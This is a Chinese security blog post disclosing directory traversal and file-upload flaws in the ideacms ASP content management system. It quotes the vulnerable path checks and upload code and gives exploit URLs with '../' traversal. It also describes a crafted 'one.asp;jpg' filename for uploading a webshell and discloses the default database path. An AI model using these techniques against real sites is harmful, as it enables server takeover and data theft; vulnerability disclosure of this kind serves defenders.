【Asp】ideacms 文章管理系统跳目录、上传等多处漏洞

  • A+
所属分类:lcx

'adminadmin_upfile.asp

'adminadmin_upfile.asp
'略
    dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath
    dim dirTemplate : dirTemplate="../Upload"
    dim path : path=getForm("path","get") : if isNul(path) then path= dirTemplate
    if left(path,9)"../Upload" then  alert "只允许编辑Upload目录","admin_upfile.asp" : die ""
'略
%>

判断问题,利用方法:

http://127.0.0.1/admin/admin_upfile.asp?path=../Upload/../../

'adminadmin_template.asp:

'adminadmin_template.asp
checkPower
'略
    dim folderList,folderNum,i,folderAttr,fileList,fileNum,j,fileAttr,folder,filedir,filename,lastLevelPath
    dim dirTemplate : dirTemplate="../template"
    dim path : path=getForm("path","get") : if isNul(path) then path= dirTemplate
    if left(path,11)"../template" then  alert "只允许编辑template目录","admin_template.asp" : die ""
'略
%>

利用方法:

http://127.0.0.1/admin/admin_template.asp?action=edit&filedir=../template/../robots.txt

Shell 篇:

'/admin/upload.asp:

'/admin/upload.asp
'略
    attachdir="/"+sitePath+"upload"'上传文件保存路径,结尾不要带/
    dirtype=2'1:按天存入目录 2:按月存入目录 3:按扩展名存目录  建议使用按天存
    maxattachsize=2097152'最大上传大小,默认是2M
    upext="txt,rar,zip,jpg,jpeg,gif,png,swf,wmv,avi,wma,mp3,mid"'上传扩展名
    
'略
                if upfile.isErr=3 then
                    err="上传文件扩展名必需为:"+upext
                else
                    err=upfile.ErrMessage
    '略
        Dim tmpPath
        isErr_=0
        Set oFileStream = CreateObject ("ADODB.Stream")
        oFileStream.Type = 1
        oFileStream.Mode = 3
        oFileStream.CharSet = "gb2312"
    '略
        tmpPath=Split(Path,".")(0)
        FileExt=GetFileExt(Path)
        if Over then
            if isAllowExt(FileExt) then
                oFileStream.SaveToFile tmpPath & "." & FileExt,2
                if Err.number0 then OutErr("保存文件时出错,请检查路径,是否存在该上传目录!该文件保存路径为" & tmpPath & "." & FileExt)
            Else
                isErr_=3
                ErrMessage_="该后缀名的文件不允许上传!"
                OutErr("该后缀名的文件不允许上传")
            End if
        Else
    '略
Public Function FileData(Item)
    isErr_=0
    if file.Exists(Item) then
        if isAllowExt(File(Item).FileExt) then
            '略
            Else
            isErr_=3
            ErrMessage_="该后缀名的文件不允许上传"
            OutErr("该后缀名的文件不允许上传")
            FileData=""
        End if
    else
        ErrMessage_="不存在该对象(如该文件没有上传,文件为空)!"
        OutErr("不存在该对象(如该文件没有上传,文件为空)")
'略
%>

判断问题,构造文件名:one.asp;jpg

上传地址:

http://127.0.0.1/admin/editor/upload.htm

其他信息:

默认数据库地址:date#A5E371101111.mdb

文章来源于lcx.cc:【Asp】ideacms 文章管理系统跳目录、上传等多处漏洞

相关推荐: 淘宝又见好东西,低价格钓鱼几个倒霉蛋骗到手大额的款项,跑路、关店

首先是低价格。。本着娱乐的精神。。买了玩玩 在是这样。。给你来个30天的延长。。。神鬼难测啊。。 最后下架。。几个倒霉蛋骗到手大额的款项。。跑路。关店。。然后从新在开一个。继续刷倒霉蛋。。。 店铺的URL: http://shop103377812.taoba…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: